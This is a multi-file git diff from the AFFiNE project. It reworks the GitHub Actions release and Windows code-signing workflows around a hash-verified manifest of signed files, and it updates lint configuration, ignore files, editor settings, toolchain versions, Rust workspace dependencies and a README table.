uses: ./.github/workflows/windows-signer.yml
with:
files: ${{ needs.make-windows-installer.outputs.FILES_TO_BE_SIGNED_arm64 }}
artifact-name: installer-win32-arm64
finalize-installer-windows:
if: ${{ inputs.desktop_windows }}
if: >-
${{
always() &&
inputs.desktop_windows &&
needs.make-windows-installer.result == 'success'
}}
needs:
[
windows-signer-gate,
make-windows-installer,
sign-packaged-artifacts-windows_x64,
sign-packaged-artifacts-windows_arm64,
sign-installer-artifacts-windows-x64,
sign-installer-artifacts-windows-arm64,
before-make,
@@ -267,22 +354,59 @@ jobs:
arch: arm64
runs-on: ${{ matrix.spec.runner }}
steps:
- name: Download and overwrite installer artifacts
- name: Download installer artifacts
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
uses: actions/download-artifact@v4
with:
name: installer-${{ matrix.spec.platform }}-${{ matrix.spec.arch }}
path: installer-unsigned
- name: unzip installer artifacts
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
run: Expand-Archive -Path installer-unsigned/archive.zip -DestinationPath packages/frontend/apps/electron/out/${{ env.BUILD_TYPE }}/make
- name: Download signed installer file diff
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
uses: actions/download-artifact@v4
with:
name: signed-installer-${{ matrix.spec.platform }}-${{ matrix.spec.arch }}
path: .
- name: unzip file
run: Expand-Archive -Path signed.zip -DestinationPath packages/frontend/apps/electron/out/${{ env.BUILD_TYPE }}/make
path: signed-installer-diff
- name: Apply signed installer file diff
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
shell: pwsh
run: |
$DiffRoot = 'signed-installer-diff/files'
$TargetRoot = 'packages/frontend/apps/electron/out/${{ env.BUILD_TYPE }}/make'
if (!(Test-Path -LiteralPath $DiffRoot)) {
throw "Signed diff directory not found: $DiffRoot"
}
Copy-Item -Path (Join-Path $DiffRoot '*') -Destination $TargetRoot -Recurse -Force
$ManifestPath = 'signed-installer-diff/manifest.json'
if (Test-Path -LiteralPath $ManifestPath) {
$ManifestEntries = @(Get-Content -LiteralPath $ManifestPath | ConvertFrom-Json)
foreach ($Entry in $ManifestEntries) {
$TargetPath = Join-Path $TargetRoot $Entry.path
if (!(Test-Path -LiteralPath $TargetPath -PathType Leaf)) {
throw "Applied signed file not found: $($Entry.path)"
}
$TargetHash = (Get-FileHash -Algorithm SHA256 -LiteralPath $TargetPath).Hash
if ($TargetHash -ne $Entry.sha256) {
throw "Signed file hash mismatch: $($Entry.path)"
}
}
}
- name: Save artifacts
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
run: |
mkdir -p builds
mv packages/frontend/apps/electron/out/*/make/zip/win32/${{ matrix.spec.arch }}/AFFiNE*-win32-${{ matrix.spec.arch }}-*.zip ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-windows-${{ matrix.spec.arch }}.zip
mv packages/frontend/apps/electron/out/*/make/squirrel.windows/${{ matrix.spec.arch }}/*.exe ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-windows-${{ matrix.spec.arch }}.exe
mv packages/frontend/apps/electron/out/*/make/nsis.windows/${{ matrix.spec.arch }}/*.exe ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-windows-${{ matrix.spec.arch }}.nsis.exe
- uses: actions/attest-build-provenance@v2
- uses: actions/attest-build-provenance@v4
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
with:
subject-path: |
./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-windows-${{ matrix.spec.arch }}.zip
@@ -290,24 +414,48 @@ jobs:
./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-windows-${{ matrix.spec.arch }}.nsis.exe
- name: Upload Artifact
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success') }}
uses: actions/upload-artifact@v4
with:
name: affine-${{ matrix.spec.platform }}-${{ matrix.spec.arch }}-builds
path: builds
release:
if: ${{ inputs.desktop_macos && inputs.desktop_linux && inputs.desktop_windows }}
if: >-
${{
always() &&
inputs.desktop_macos &&
inputs.desktop_linux &&
inputs.desktop_windows &&
needs.before-make.result == 'success' &&
needs.make-distribution-macos.result == 'success' &&
needs.make-distribution-linux.result == 'success' &&
(
!inputs.require-windows-signing ||
(
needs.sign-packaged-artifacts-windows_x64.result == 'success' &&
needs.sign-packaged-artifacts-windows_arm64.result == 'success' &&
needs.sign-installer-artifacts-windows-x64.result == 'success' &&
needs.sign-installer-artifacts-windows-arm64.result == 'success' &&
needs.finalize-installer-windows.result == 'success'
)
)
}}
needs:
[
before-make,
make-distribution-macos,
make-distribution-linux,
sign-packaged-artifacts-windows_x64,
sign-packaged-artifacts-windows_arm64,
sign-installer-artifacts-windows-x64,
sign-installer-artifacts-windows-arm64,
finalize-installer-windows,
]
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Download Artifacts (macos-x64)
uses: actions/download-artifact@v4
with:
@@ -319,11 +467,13 @@ jobs:
name: affine-darwin-arm64-builds
path: ./release
- name: Download Artifacts (windows-x64)
if: ${{ needs.sign-packaged-artifacts-windows_x64.result == 'success' && needs.sign-installer-artifacts-windows-x64.result == 'success' }}
uses: actions/download-artifact@v4
with:
name: affine-win32-x64-builds
path: ./release
- name: Download Artifacts (windows-arm64)
if: ${{ needs.sign-packaged-artifacts-windows_arm64.result == 'success' && needs.sign-installer-artifacts-windows-arm64.result == 'success' }}
uses: actions/download-artifact@v4
with:
name: affine-win32-arm64-builds
@@ -333,7 +483,7 @@ jobs:
with:
name: affine-linux-x64-builds
path: ./release
- uses: actions/setup-node@v4
- uses: actions/setup-node@v6
with:
node-version: 20
- name: Copy Selfhost Release Files
+13 -11
View File
@@ -26,7 +26,7 @@ jobs:
runs-on: ubuntu-latest
environment: ${{ inputs.build-type }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -54,7 +54,7 @@ jobs:
build-android-web:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -83,7 +83,7 @@ jobs:
needs:
- build-ios-web
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -114,7 +114,7 @@ jobs:
- name: Cap sync
run: yarn workspace @affine/ios sync
- name: Signing By Apple Developer ID
uses: apple-actions/import-codesign-certs@v5
uses: apple-actions/import-codesign-certs@v7
id: import-codesign-certs
with:
p12-file-base64: ${{ secrets.CERTIFICATES_P12_MOBILE }}
@@ -128,9 +128,9 @@ jobs:
- name: Testflight
working-directory: packages/frontend/apps/ios/App
run: |
echo -n "${{ env.BUILD_PROVISION_PROFILE }}" | base64 --decode -o $PP_PATH
mkdir -p ~/Library/MobileDevice/Provisioning\ Profiles
cp $PP_PATH ~/Library/MobileDevice/Provisioning\ Profiles
printf '%s' "$BUILD_PROVISION_PROFILE" | base64 --decode -o "$PP_PATH"
mkdir -p "$HOME/Library/MobileDevice/Provisioning Profiles"
cp "$PP_PATH" "$HOME/Library/MobileDevice/Provisioning Profiles"
fastlane beta
env:
BUILD_TARGET: distribution
@@ -147,7 +147,7 @@ jobs:
needs:
- build-android-web
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -160,7 +160,9 @@ jobs:
- name: Load Google Service file
env:
DATA: ${{ secrets.FIREBASE_ANDROID_GOOGLE_SERVICE_JSON }}
run: echo $DATA | base64 -di > packages/frontend/apps/android/App/app/google-services.json
run: |
set -euo pipefail
printf '%s' "$DATA" | base64 -di > packages/frontend/apps/android/App/app/google-services.json
- name: Setup Node.js
uses: ./.github/actions/setup-node
timeout-minutes: 10
@@ -178,7 +180,7 @@ jobs:
no-build: 'true'
- name: Cap sync
run: yarn workspace @affine/android cap sync
- uses: actions/setup-python@v5
- uses: actions/setup-python@v6
with:
python-version: '3.13'
- name: Auth gcloud
@@ -190,7 +192,7 @@ jobs:
token_format: 'access_token'
project_id: '${{ secrets.GCP_PROJECT_ID }}'
access_token_scopes: 'https://www.googleapis.com/auth/androidpublisher'
- uses: actions/setup-java@v4
- uses: actions/setup-java@v5
with:
distribution: 'temurin'
java-version: '21'
+4 -3
View File
@@ -55,7 +55,7 @@ jobs:
GIT_SHORT_HASH: ${{ steps.prepare.outputs.GIT_SHORT_HASH }}
BUILD_TYPE: ${{ steps.prepare.outputs.BUILD_TYPE }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Prepare Release
id: prepare
uses: ./.github/actions/prepare-release
@@ -72,7 +72,7 @@ jobs:
steps:
- name: Decide whether to release
id: decide
uses: actions/github-script@v7
uses: actions/github-script@v9
with:
script: |
const buildType = '${{ needs.prepare.outputs.BUILD_TYPE }}'
@@ -148,7 +148,7 @@ jobs:
name: Wait for approval
with:
secret: ${{ secrets.GITHUB_TOKEN }}
approvers: darkskygit,pengx17,L-Sun,EYHN
approvers: darkskygit
minimum-approvals: 1
fail-on-denial: true
issue-title: Please confirm to release docker image
@@ -195,6 +195,7 @@ jobs:
desktop_macos: ${{ github.event_name != 'workflow_dispatch' || inputs.desktop_macos }}
desktop_windows: ${{ github.event_name != 'workflow_dispatch' || inputs.desktop_windows }}
desktop_linux: ${{ github.event_name != 'workflow_dispatch' || inputs.desktop_linux }}
require-windows-signing: ${{ needs.prepare.outputs.BUILD_TYPE == 'beta' || needs.prepare.outputs.BUILD_TYPE == 'stable' || (github.event_name == 'workflow_dispatch' && inputs.desktop_windows) }}
mobile:
name: Release Mobile
+35 -5
View File
@@ -30,13 +30,43 @@ jobs:
run: |
cd ${{ env.ARCHIVE_DIR }}/out
signtool sign /tr http://timestamp.globalsign.com/tsa/r6advanced1 /td sha256 /fd sha256 /a ${{ inputs.files }}
- name: zip file
shell: cmd
- name: collect signed file diff
shell: powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -File {0}
run: |
cd ${{ env.ARCHIVE_DIR }}
7za a signed.zip .\out\*
$OutDir = Join-Path '${{ env.ARCHIVE_DIR }}' 'out'
$DiffDir = Join-Path '${{ env.ARCHIVE_DIR }}' 'signed-diff'
$FilesDir = Join-Path $DiffDir 'files'
New-Item -ItemType Directory -Path $FilesDir -Force | Out-Null
$SignedFiles = [regex]::Matches('${{ inputs.files }}', '"([^"]+)"') | ForEach-Object { $_.Groups[1].Value }
if ($SignedFiles.Count -eq 0) {
throw 'No files to sign were provided.'
}
$Manifest = @()
foreach ($RelativePath in $SignedFiles) {
$SourcePath = Join-Path $OutDir $RelativePath
if (!(Test-Path -LiteralPath $SourcePath -PathType Leaf)) {
throw "Signed file not found: $RelativePath"
}
$TargetPath = Join-Path $FilesDir $RelativePath
$TargetDir = Split-Path -Parent $TargetPath
if ($TargetDir) {
New-Item -ItemType Directory -Path $TargetDir -Force | Out-Null
}
Copy-Item -LiteralPath $SourcePath -Destination $TargetPath -Force
$Manifest += [PSCustomObject]@{
path = $RelativePath
sha256 = (Get-FileHash -Algorithm SHA256 -LiteralPath $TargetPath).Hash
}
}
$Manifest | ConvertTo-Json -Depth 4 | Out-File -FilePath (Join-Path $DiffDir 'manifest.json') -Encoding utf8
Write-Host "Collected $($SignedFiles.Count) signed files."
- name: upload
uses: actions/upload-artifact@v4
with:
name: signed-${{ inputs.artifact-name }}
path: ${{ env.ARCHIVE_DIR }}/signed.zip
path: ${{ env.ARCHIVE_DIR }}/signed-diff
+10
View File
@@ -6,6 +6,7 @@
!.yarn/releases
!.yarn/sdks
.yarn/versions
.corepack-bin
# compiled output
*dist
@@ -48,6 +49,9 @@ testem.log
/typings
tsconfig.tsbuildinfo
.context
/*.md
.codex
.cursor
# System Files
.DS_Store
@@ -92,3 +96,9 @@ af.cmd
# playwright
storageState.json
/.understand-anything
# local test/browser artifacts
/.playwright-browsers/
**/.vitest-attachments/
/blocksuite/framework/std/src/__tests__/gfx/__screenshots__/
+1 -1
View File
@@ -1 +1 @@
22.22.0
22.22.3
+162 -4
View File
@@ -1,16 +1,30 @@
{
"$schema": "./node_modules/oxlint/configuration_schema.json",
"jsPlugins": [
"eslint-plugin-simple-import-sort",
"eslint-plugin-sonarjs",
"eslint-plugin-lit"
],
"plugins": ["import", "react", "typescript", "unicorn", "promise"],
"categories": {
"correctness": "error",
"perf": "error"
},
"options": {
"typeAware": true
},
"env": {
"builtin": true,
"es2026": true
},
"ignorePatterns": [
"**/node_modules",
".yarn",
".github/helm",
".git",
".vscode",
".context",
".codex",
".yarnrc.yml",
".docker",
"**/.storybook",
@@ -39,11 +53,63 @@
"packages/frontend/apps/ios/App/**",
"tests/blocksuite/snapshots",
"blocksuite/docs/api/**",
"blocksuite/docs-site/.vitepress/.temp/**",
"blocksuite/docs-site/api/**",
"packages/frontend/admin/src/config.json",
"**/test-docs.json",
"**/test-blocks.json"
],
"rules": {
"no-empty-static-block": "error",
"no-misleading-character-class": "error",
"no-new-native-nonconstructor": "error",
"no-unused-private-class-members": "error",
"no-useless-backreference": "error",
"react/display-name": "error",
"react/rules-of-hooks": "error",
"react/exhaustive-deps": "warn",
"typescript/prefer-for-of": "error",
"typescript/no-unsafe-function-type": "error",
"typescript/no-wrapper-object-types": "error",
"typescript/unified-signatures": "error",
"typescript/await-thenable": "allow",
"typescript/no-floating-promises": "allow",
"typescript/no-misused-promises": "allow",
"typescript/prefer-readonly": "allow",
"typescript/require-array-sort-compare": "allow",
"typescript/return-await": ["error", "error-handling-correctness-only"],
"typescript/no-array-delete": "allow",
"typescript/no-base-to-string": "allow",
"typescript/no-duplicate-type-constituents": "allow",
"typescript/no-for-in-array": "allow",
"typescript/no-implied-eval": "allow",
"typescript/no-meaningless-void-operator": "allow",
"typescript/no-misused-spread": "allow",
"typescript/no-redundant-type-constituents": "allow",
"typescript/no-unnecessary-parameter-property-assignment": "allow",
"typescript/no-unsafe-unary-minus": "allow",
"typescript/no-useless-empty-export": "allow",
"typescript/prefer-namespace-keyword": "allow",
"typescript/prefer-string-starts-ends-with": "allow",
"typescript/restrict-template-expressions": "allow",
"typescript/unbound-method": "allow",
"no-restricted-imports": [
"error",
{
"patterns": [
{
"group": ["**/dist"],
"message": "Don't import from dist",
"allowTypeImports": false
},
{
"group": ["**/src"],
"message": "Don't import from src",
"allowTypeImports": false
}
]
}
],
"no-await-in-loop": "allow",
"no-redeclare": "allow",
"promise/no-callback-in-promise": "allow",
@@ -70,6 +136,14 @@
"no-func-assign": "error",
"no-global-assign": "error",
"no-unused-vars": "error",
"no-unused-expressions": [
"error",
{
"allowShortCircuit": true,
"allowTernary": true,
"allowTaggedTemplates": true
}
],
"no-ex-assign": "error",
"no-loss-of-precision": "error",
"no-fallthrough": "error",
@@ -126,6 +200,30 @@
"react/no-render-return-value": "error",
"react/jsx-no-target-blank": "error",
"react/jsx-no-comment-textnodes": "error",
"react/no-array-index-key": "off",
"simple-import-sort/imports": "error",
"simple-import-sort/exports": "error",
"sonarjs/no-all-duplicated-branches": "error",
"sonarjs/no-element-overwrite": "error",
"sonarjs/no-empty-collection": "error",
"sonarjs/no-extra-arguments": "error",
"sonarjs/no-identical-conditions": "error",
"sonarjs/no-identical-expressions": "error",
"sonarjs/no-ignored-return": "error",
"sonarjs/no-use-of-empty-return-value": "error",
"sonarjs/non-existent-operator": "error",
"sonarjs/no-collapsible-if": "error",
"sonarjs/no-same-line-conditional": "error",
"sonarjs/no-duplicated-branches": "error",
"sonarjs/no-collection-size-mischeck": "error",
"sonarjs/no-identical-functions": "error",
"sonarjs/no-gratuitous-expressions": "error",
"lit/attribute-value-entities": "error",
"lit/binding-positions": "error",
"lit/no-duplicate-template-bindings": "error",
"lit/no-invalid-html": "error",
"lit/no-legacy-template-syntax": "error",
"lit/no-property-change-update": "error",
"typescript/consistent-type-imports": "error",
"typescript/no-non-null-assertion": "error",
"typescript/triple-slash-reference": "error",
@@ -133,7 +231,6 @@
"typescript/no-duplicate-enum-values": "error",
"typescript/no-extra-non-null-assertion": "error",
"typescript/no-misused-new": "error",
"typescript/prefer-for-of": "error",
"typescript/no-unsafe-declaration-merging": "error",
"typescript/no-unnecessary-type-constraint": "error",
"typescript/no-this-alias": [
@@ -185,11 +282,10 @@
"ignoreTypes": true
}
],
"import/sort-imports": "error",
"import/namespace": "off",
"import/no-webpack-loader-syntax": "error",
"import/no-duplicates": "error",
"import/no-import-assign": "error",
"no-import-assign": "error",
"import/no-self-import": "error"
},
"overrides": [
@@ -228,7 +324,7 @@
{
"files": ["blocksuite/**/*.ts"],
"rules": {
"eslint/eqeqeq": "off",
"eqeqeq": "off",
"typescript/no-non-null-assertion": "off",
"unicorn/prefer-array-some": "off"
}
@@ -241,6 +337,68 @@
"typescript/consistent-type-imports": "off",
"import/no-cycle": "off"
}
},
{
"files": [
"packages/**/*.{ts,tsx}",
"tools/**/*.{ts,tsx}",
"blocksuite/**/*.{ts,tsx}"
],
"rules": {
"typescript/await-thenable": "error",
"typescript/no-floating-promises": [
"error",
{
"ignoreVoid": false,
"ignoreIIFE": false
}
],
"typescript/no-misused-promises": "error",
"typescript/prefer-readonly": "error",
"typescript/require-array-sort-compare": "error",
"react/exhaustive-deps": [
"warn",
{
"additionalHooks": "(useAsyncCallback|useCatchEventCallback|useDraggable|useDropTarget|useRefEffect)"
}
]
}
},
{
"files": [
"**/__tests__/**/*",
"**/*.stories.tsx",
"**/*.spec.ts",
"**/tests/**/*",
"scripts/**/*",
"**/benchmark/**/*",
"**/__debug__/**/*",
"**/e2e/**/*"
],
"rules": {
"typescript/no-floating-promises": [
"error",
{
"ignoreVoid": true,
"ignoreIIFE": false
}
],
"typescript/no-misused-promises": "off",
"no-restricted-imports": "off"
}
},
{
"files": ["**/*.{ts,js,mjs}"],
"rules": {
"react/rules-of-hooks": "off"
}
},
{
"files": ["blocksuite/framework/std/src/view/element/lit-host.ts"],
"rules": {
"lit/binding-positions": "off",
"lit/no-invalid-html": "off"
}
}
]
}
+4
View File
@@ -4,6 +4,8 @@
.github/helm
.git
.vscode
.context
.codex
.yarnrc.yml
.docker
**/.storybook
@@ -38,6 +40,8 @@ packages/frontend/apps/android/App/**
packages/frontend/apps/ios/App/**
tests/blocksuite/snapshots
blocksuite/docs/api/**
blocksuite/docs-site/.vitepress/.temp/**
blocksuite/docs-site/api/**
packages/frontend/admin/src/config.json
**/test-docs.json
**/test-blocks.json
+3 -1
View File
@@ -17,7 +17,7 @@
"explorer.fileNesting.enabled": true,
"explorer.fileNesting.patterns": {
"*.js": "${capture}.js.map, ${capture}.min.js, ${capture}.d.ts, ${capture}.d.ts.map",
"package.json": ".browserslist*, .circleci*, .codecov, .commitlint*, .cz-config.js, .czrc, .dlint.json, .dprint.json, .editorconfig, .eslint*, eslint.*, .firebase*, .flowconfig, .github*, .gitlab*, .gitpod*, .huskyrc*, .jslint*, .lighthouserc.*, .lintstagedrc*, .markdownlint*, .mocha*, .node-version, .nodemon*, .npm*, .nvmrc, .pm2*, .pnp.*, .pnpm*, .prettier*, .releaserc*, .sentry*, .stackblitz*, .styleci*, .stylelint*, .tazerc*, .textlint*, .tool-versions, .travis*, .versionrc*, .vscode*, .watchman*, .xo-config*, .yamllint*, .yarnrc*, Procfile, api-extractor.json, apollo.config.*, appveyor*, ava.config.*, azure-pipelines*, bower.json, build.config.*, commitlint*, dangerfile*, dlint.json, dprint.json, firebase.json, grunt*, gulp*, histoire.config.*, jasmine.*, jenkins*, jest.config.*, jsconfig.*, karma*, lerna*, lighthouserc.*, lint-staged*, nest-cli.*, netlify*, nodemon*, nx.*, package-lock.json, package.nls*.json, phpcs.xml, playwright.config.*, pm2.*, pnpm*, prettier*, pullapprove*, puppeteer.config.*, pyrightconfig.json, release-tasks.sh, renovate*, rollup.config.*, stylelint*, tsconfig.*, tsdoc.*, tslint*, tsup.config.*, turbo*, typedoc*, unlighthouse*, vercel*, vetur.config.*, vitest.*, webpack*, workspace.json, xo.config.*, yarn*, babel.*, .babelrc, project.json, oxlint.json, nyc.config.*",
"package.json": ".browserslist*, .circleci*, .codecov, .commitlint*, .cz-config.js, .czrc, .dlint.json, .dprint.json, .editorconfig, .eslint*, eslint.*, .firebase*, .flowconfig, .github*, .gitlab*, .gitpod*, .huskyrc*, .jslint*, .lighthouserc.*, .lintstagedrc*, .markdownlint*, .mocha*, .node-version, .nodemon*, .npm*, .nvmrc, .pm2*, .pnp.*, .pnpm*, .prettier*, .releaserc*, .sentry*, .stackblitz*, .styleci*, .stylelint*, .tazerc*, .textlint*, .tool-versions, .travis*, .versionrc*, .vscode*, .watchman*, .xo-config*, .yamllint*, .yarnrc*, Procfile, api-extractor.json, apollo.config.*, appveyor*, ava.config.*, azure-pipelines*, bower.json, build.config.*, commitlint*, dangerfile*, dlint.json, dprint.json, firebase.json, grunt*, gulp*, histoire.config.*, jasmine.*, jenkins*, jest.config.*, jsconfig.*, karma*, lerna*, lighthouserc.*, lint-staged*, nest-cli.*, netlify*, nodemon*, nx.*, package-lock.json, package.nls*.json, phpcs.xml, playwright.config.*, pm2.*, pnpm*, prettier*, pullapprove*, puppeteer.config.*, pyrightconfig.json, release-tasks.sh, renovate*, rollup.config.*, stylelint*, tsconfig.*, tsdoc.*, tslint*, tsup.config.*, turbo*, typedoc*, unlighthouse*, vercel*, vetur.config.*, vitest.*, webpack*, workspace.json, xo.config.*, yarn*, babel.*, .babelrc, project.json, .oxlintrc.json, oxlint.json, nyc.config.*",
"Cargo.toml": "Cargo.lock, rust-toolchain*, rustfmt.toml, .taplo.toml",
"README.md": "LICENSE*, CHANGELOG.md, CODE_OF_CONDUCT.md, CONTRIBUTING.md, SECURITY.md, README.*",
".gitignore": ".gitattributes, .dockerignore, .eslintignore, .prettierignore, .stylelintignore, .tslintignore, .yarnignore"
@@ -32,6 +32,8 @@
"editor.defaultFormatter": "esbenp.prettier-vscode"
},
"vitest.include": ["packages/**/*.spec.ts", "packages/**/*.spec.tsx"],
"eslint.runtime": "node",
"eslint.execArgv": ["--max_old_space_size=16384"],
"rust-analyzer.check.extraEnv": {
"DATABASE_URL": "sqlite:affine.db"
},
-942
View File
File diff suppressed because one or more lines are too long
+940
View File
File diff suppressed because one or more lines are too long
+1 -1
View File
@@ -12,4 +12,4 @@ npmPublishAccess: public
npmRegistryServer: "https://registry.npmjs.org"
yarnPath: .yarn/releases/yarn-4.12.0.cjs
yarnPath: .yarn/releases/yarn-4.13.0.cjs
Generated
+4735 -867
View File
File diff suppressed because it is too large Load Diff
+37 -25
View File
@@ -2,8 +2,6 @@
members = [
"./packages/backend/native",
"./packages/common/native",
"./packages/common/y-octo/core",
"./packages/common/y-octo/utils",
"./packages/frontend/mobile-native",
"./packages/frontend/native",
"./packages/frontend/native/nbstore",
@@ -16,13 +14,14 @@ resolver = "3"
edition = "2024"
[workspace.dependencies]
aes-gcm = "0.10"
affine_common = { path = "./packages/common/native" }
affine_nbstore = { path = "./packages/frontend/native/nbstore" }
ahash = "0.8"
anyhow = "1"
arbitrary = { version = "1.3", features = ["derive"] }
assert-json-diff = "2.0"
async-lock = { version = "3.4.0", features = ["loom"] }
base64 = "0.22.1"
base64-simd = "0.8"
bitvec = "1.0"
block2 = "0.6"
@@ -36,17 +35,31 @@ resolver = "3"
criterion2 = { version = "3", default-features = false }
crossbeam-channel = "0.5"
dispatch2 = "0.3"
docx-parser = { git = "https://github.com/toeverything/docx-parser" }
doc_extractor = "0.1.0"
dotenvy = "0.15"
file-format = { version = "0.28", features = ["reader"] }
hex = "0.4"
homedir = "0.3"
image = { version = "0.25.9", default-features = false, features = [
"bmp",
"gif",
"jpeg",
"png",
"webp",
] }
infer = { version = "0.19.0" }
lasso = { version = "0.7", features = ["multi-threaded"] }
lib0 = { version = "0.16", features = ["lib0-serde"] }
libc = "0.2"
libwebp-sys = "0.14.2"
little_exif = "0.6.23"
llm_adapter = { version = "0.2", default-features = false }
llm_runtime = { version = "0.2", default-features = false }
log = "0.4"
loom = { version = "0.7", features = ["checkpoint"] }
memory-indexer = "0.3.0"
lru = "0.16"
matroska = "0.30"
memory-indexer = "0.3.1"
mermaid-rs-renderer = { git = "https://github.com/toeverything/mermaid-rs-renderer", rev = "fba9097", default-features = false }
mimalloc = "0.1"
mp4parse = "0.17"
nanoid = "0.4"
@@ -63,11 +76,11 @@ resolver = "3"
notify = { version = "8", features = ["serde"] }
objc2 = "0.6"
objc2-foundation = "0.3"
ogg = "0.9"
once_cell = "1"
ordered-float = "5"
p256 = { version = "0.13", features = ["ecdsa", "pem"] }
parking_lot = "0.12"
path-ext = "0.1.2"
pdf-extract = { git = "https://github.com/toeverything/pdf-extract", branch = "darksky/improve-font-decoding" }
phf = { version = "0.11", features = ["macros"] }
proptest = "1.3"
proptest-derive = "0.5"
@@ -76,12 +89,14 @@ resolver = "3"
rand_chacha = "0.9"
rand_distr = "0.5"
rayon = "1.10"
readability = { version = "0.3.0", default-features = false }
regex = "1.10"
rubato = "0.16"
safefetch = "0.1.0"
schemars = "0.8"
screencapturekit = "0.3"
serde = "1"
serde_json = "1"
sha2 = "0.10"
sha3 = "0.10"
smol_str = "0.3"
sqlx = { version = "0.8", default-features = false, features = [
@@ -90,26 +105,19 @@ resolver = "3"
"migrate",
"runtime-tokio",
"sqlite",
"tls-rustls",
] }
strum_macros = "0.27.0"
symphonia = { version = "0.5", features = ["all", "opt-simd"] }
text-splitter = "0.27"
thiserror = "2"
tiktoken-rs = "0.7"
tokio = "1.45"
tree-sitter = { version = "0.25" }
tree-sitter-c = { version = "0.24" }
tree-sitter-c-sharp = { version = "0.23" }
tree-sitter-cpp = { version = "0.23" }
tree-sitter-go = { version = "0.23" }
tree-sitter-java = { version = "0.23" }
tree-sitter-javascript = { version = "0.23" }
tree-sitter-kotlin-ng = { version = "1.1" }
tree-sitter-python = { version = "0.23" }
tree-sitter-rust = { version = "0.24" }
tree-sitter-scala = { version = "0.24" }
tree-sitter-typescript = { version = "0.23" }
typst = "0.14.2"
typst-as-lib = { version = "0.15.4", default-features = false, features = [
"packages",
"typst-kit-embed-fonts",
"typst-kit-fonts",
"ureq",
] }
typst-svg = "0.14.2"
uniffi = "0.29"
url = { version = "2.5" }
uuid = "1.8"
@@ -127,7 +135,7 @@ resolver = "3"
"Win32_UI_Shell_PropertiesSystem",
] }
windows-core = { version = "0.61" }
y-octo = { path = "./packages/common/y-octo/core" }
y-octo = "0.0.3"
y-sync = { version = "0.4" }
yrs = "0.23.0"
@@ -143,3 +151,7 @@ strip = "symbols"
# android uniffi bindgen requires symbols
[profile.release.package.affine_mobile_native]
strip = "none"
# [patch.crates-io]
# llm_adapter = { path = "../llm_adapter/crates/llm_adapter" }
# llm_runtime = { path = "../llm_adapter/crates/llm_runtime" }
+8 -14
View File
@@ -90,10 +90,10 @@ Thanks for checking us out, we appreciate your interest and sincerely hope that
## Contributing
| Bug Reports | Feature Requests | Questions/Discussions | AFFiNE Community |
| --------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------- | ---------------------------------------------------------- |
| [Create a bug report](https://github.com/toeverything/AFFiNE/issues/new?assignees=&labels=bug%2Cproduct-review&template=BUG-REPORT.yml&title=TITLE) | [Submit a feature request](https://github.com/toeverything/AFFiNE/issues/new?assignees=&labels=feat%2Cproduct-review&template=FEATURE-REQUEST.yml&title=TITLE) | [Check GitHub Discussion](https://github.com/toeverything/AFFiNE/discussions) | [Visit the AFFiNE Community](https://community.affine.pro) |
| Something isn't working as expected | An idea for a new feature, or improvements | Discuss and ask questions | A place to ask, learn and engage with others |
| Bug Reports | Feature Requests | Questions/Discussions | AFFiNE Community |
| --------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------- | ----------------------------------------------------------------- |
